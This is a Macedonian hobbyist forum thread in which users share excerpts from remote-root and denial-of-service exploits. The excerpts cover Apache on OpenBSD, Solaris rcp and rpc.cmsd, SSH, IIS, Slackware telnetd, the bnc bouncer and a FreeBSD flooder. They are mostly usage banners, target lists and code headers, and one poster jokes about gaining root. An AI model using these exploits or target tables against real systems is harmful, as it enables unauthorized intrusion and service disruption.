Virtual Macedonia Forums

New Exploits!

New Exploits!
plasmatik	mozam samo da vi pokazam samo mal del od novite exploiti shto se napraveni .. Na Primer e napraven remote exploit (za site vidovi na Redhat) od 6.2 do 7.3 (ne samo za najnovata verzija), koj odi preku OpenSSl naredniot pak kje vi pokazam i primer kako odi toa .. da fatam i jas nekoj root :)))))) -- Postoi nov exploit za OpenBSD -- Usage: ./apache-scalp Using targets: ./apache-scalp 3 127.0.0.1:8080 Using bruteforce: ./apache-scalp 0x8f000 127.0.0.1:8080 --- --- - Potential targets list - --- ---- Target ID / Target specification 0 / OpenBSD 3.0 x86 / Apache 1.3.20 1 / OpenBSD 3.0 x86 / Apache 1.3.22 2 / OpenBSD 3.0 x86 / Apache 1.3.24 3 / OpenBSD 3.1 x86 / Apache 1.3.20 4 / OpenBSD 3.1 x86 / Apache 1.3.23 5 / OpenBSD 3.1 x86 / Apache 1.3.24 6 / OpenBSD 3.1 x86 / Apache 1.3.24 #2 Koj Vleguva Vo Sistemot so pomosh na Apacheto so e instalirano .. ali so uid 43 :)) (so local i se zema 0 uid) - Postoi Nov Exploit za Solaris (Za Site Verzii). - Toj Odi preku rcp : --- ---- copyright LAST STAGE OF DELIRIUM jan 2002 poland //lsd-pl.net/ xxxxxx for solaris 2.6 2.7 2.8 sparc usage: ./xxxxx address [-p port] [-o ofs] -v 6\|7 [-b] [-m] --- ---- ima isto taka za Solaris koj odi preku sadmin ali momentalno ne sum zapoznat ! - Exploit SSH-1.99-OpenSSH_3.0p1 - %affected = ( 'Unknown', 'unknown', 'SSH-1.4-1.2.13', 'not affected', 'SSH-1.4-1.2.14', 'not affected', 'SSH-1.4-1.2.15', 'not affected', 'SSH-1.4-1.2.16', 'not affected', 'SSH-1.5-1.2.17', 'not affected', 'SSH-1.5-1.2.18', 'not affected', 'SSH-1.5-1.2.19', 'not affected', 'SSH-1.5-1.2.20', 'not affected', 'SSH-1.5-1.2.21', 'not affected', 'SSH-1.5-1.2.22', 'not affected', 'SSH-1.5-1.2.23', 'not affected', 'SSH-1.5-1.2.24', 'affected', 'SSH-1.5-1.2.25', 'affected', 'SSH-1.5-1.2.26', 'affected', 'SSH-1.5-1.2.27', 'affected', 'SSH-1.5-1.2.28', 'affected', 'SSH-1.5-1.2.29', 'affected', 'SSH-1.5-1.2.30', 'affected', 'SSH-1.5-1.2.31', 'affected', 'SSH-1.5-1.2.31a', 'not affected', # Custom version post-CORE advisory 'SSH-1.5-1.2.32', 'not affected', 'SSH-1.5-1.3.6', 'affected', 'SSH-1.5-1.3.7', 'affected', 'SSH-1.5-1.3.8', 'affected', 'SSH-1.5-1.3.9', 'affected', 'SSH-1.5-1.3.10', 'affected', # F-Secure SSH versions prior to 1.3.11-2 'SSH-1.5-Cisco-1.25', 'unknown', 'SSH-1.5-OSU_1.5alpha1', 'unknown', 'SSH-1.5-OpenSSH-1.2', 'affected', 'SSH-1.5-OpenSSH-1.2.1', 'affected', 'SSH-1.5-OpenSSH-1.2.2', 'affected', 'SSH-1.5-OpenSSH-1.2.3', 'affected', 'SSH-1.5-OpenSSH_2.5.1', 'not affected', 'SSH-1.5-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p2', 'not affected', 'SSH-1.5-RemotelyAnywhere', 'not affected', 'SSH-1.99-2.0.11', 'affected w/Version 1 fallback', 'SSH-1.99-2.0.12', 'affected w/Version 1 fallback', 'SSH-1.99-2.0.13', 'affected w/Version 1 fallback', 'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback', 'SSH-1.99-2.1.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.2.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.3.0', 'affected w/Version 1 fallback', 'SSH-1.99-2.4.0', 'affected w/Version 1 fallback', 'SSH-1.99-3.0.0', 'affected w/Version 1 fallback', 'SSH-1.99-3.0.1', 'affected w/Version 1 fallback', 'SSH-1.5-OpenSSH-2.1', 'affected', 'SSH-1.5-OpenSSH_2.1.1', 'affected', 'SSH-1.5-OpenSSH_2.2.0', 'affected', 'SSH-1.5-OpenSSH_2.2.0p1', 'affected', 'SSH-1.5-OpenSSH_2.3.0', 'not affected', 'SSH-1.5-OpenSSH_2.3.0p1', 'not affected', 'SSH-1.5-OpenSSH_2.5.1', 'not affected', 'SSH-1.5-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.5-OpenSSH_2.5.1p2', 'not affected', 'SSH-1.5-OpenSSH_2.5.2p2', 'not affected', 'SSH-1.5-OpenSSH_2.9.9p2', 'not affected', 'SSH-1.5-OpenSSH_2.9', 'not affected', 'SSH-1.5-OpenSSH_2.9p1', 'not affected', 'SSH-1.5-OpenSSH_2.9p2', 'not affected', 'SSH-1.5-OpenSSH_3.0p1', 'not affected', 'SSH-1.5-OpenSSH-2.1', 'affected', 'SSH-1.99-OpenSSH_2.1.1', 'affected', 'SSH-1.99-OpenSSH_2.2.0', 'affected', 'SSH-1.99-OpenSSH_2.2.0p1', 'affected', 'SSH-1.99-OpenSSH_2.3.0', 'not affected', 'SSH-1.99-OpenSSH_2.3.0p1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1p1', 'not affected', 'SSH-1.99-OpenSSH_2.5.1p2', 'not affected', 'SSH-1.99-OpenSSH_2.5.2p2', 'not affected', 'SSH-1.99-OpenSSH_2.9.9p2', 'not affected', 'SSH-1.99-OpenSSH_2.9', 'not affected', 'SSH-1.99-OpenSSH_2.9p1', 'not affected', 'SSH-1.99-OpenSSH_2.9p2', 'not affected', 'SSH-1.99-OpenSSH_3.0p1', 'not affected', ); -- Nov Exploit za IIS4/5 -- Pazi ja stranata cicko boris :))) da ne udri ti udri nekoj kadro so gjaolsko vo vrazule :)))) -- Nov Exploit za XP -- Ima nov exploit za Xp Koj raboti vrz baza na Instaliran Yahoo Messinger ... "postara verzija". Zatoa site korisnici se molat ako se zadovolni od Xp barem neka sibnuvaat najnovi vezii na yahoo messingeri :))) Ima I mnogu Drugi ... Samo tie se vo tajnost :)) http://www.geocrawler.com/archives/3/216/2002/7/0/9191278/
micko	site exploiti za bsd bea bazirani na OpenSSL, samo sho toa odma se patch-irase (e sea nekoj ako zaboravil jebiga). vo vrska so red-hat .. toa ti e shareno isto ko windows taka da ima mnogu dupki. inache apache i openssh se odmna zatvoreni. pred nekoj den mislam deka iskoci nova verzija na openssh v3.4p1 taka da se zatvori taa dupka.
plasmatik	here goes nesto svezo :)) --------------------------------------------------------------------- ...::: IIS4/5 :::... od vujce od australija :)) IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit - 0 ] - IIS5 Windows 2000 by hsj - 1 ] - IIS5 Windows 2000 Chinese SP0 - SP1 - 2 ] - IIS5 Windows 2000 Chinese SP2 - 3 ] - IIS5 Windows 2000 English SP2 - 4 ] - IIS4 Windows NT4 - -------------------------------------------------------------- aspcode.c ver1.0 iis4.0Ąĸiis5.0Ąĸiis5.1 asp.dll overflow program ---------------------------------------------------------------------- ---------------------------------------------------------------------- ...::: Novo za Slackware 8.0 :::... remote telnetd 0.17 exploit Usage: ./sortelnetd -h this lame message -v victim IP -t target -e override envirnoment address -g override GOT address -i override netibuf address -r sourceip (attempt raw sockets (crazy... for ip fragmentation and not tcp split)) -d recieve delay (tweak depending on lag... i guess if ur very lagged 10 will do) -p source port (only raw) Available Targets: 0) Slackware 8.0 ---------------------------------------------------------------------- ...::: za Solaris 2.6 and 7.0 :::... /* * cmsdex - i386 Solaris remote root exploit for /usr/dt/bin/rpc.cmsd * * Tested and confirmed under Solaris 2.6 and 7.0 (i386) * Demonstration values for i386 Solaris: * * (2.6) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x0804748c -o 0 * (7.0) cmsdex -h host.example.com -c "touch /0wn3d" -s 0x08047378 -o 0 * ---------------------------------------------------------------------- ...::: Bouncer :::... /* * SDI irc bouncer exploit * * This source exploits a buffer overflow in the bnc, * popular irc bouncer, binding a shell. * * Tested against bnc 2.2.4 running on linux. ---------------------------------------------------------------------- ...::: Flooder Za freeBSD :::... /* stream3.c - FIN/ACK flooder Tested to compile and work under FreeBSD (c) by XXXXX @ XXXXXXXXXX, 2002 [email protected] http://www.security.nnov.ru Thanx to xxxxxx & xxxxxx for discovering this problem Greetz to xxxx.xx. Get better, Xxxx! */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 ---------------------------------------------------------------------- aj za nedela deka kje vi pokazam nesto novo!
Oziris	car si miho :)))) bbl !
plasmatik	da toa da .. ali fintava e mnogu ljuge so ne se zapoznati taka .. da mozi da sluzi kako dobar sovet :)) neli!?!?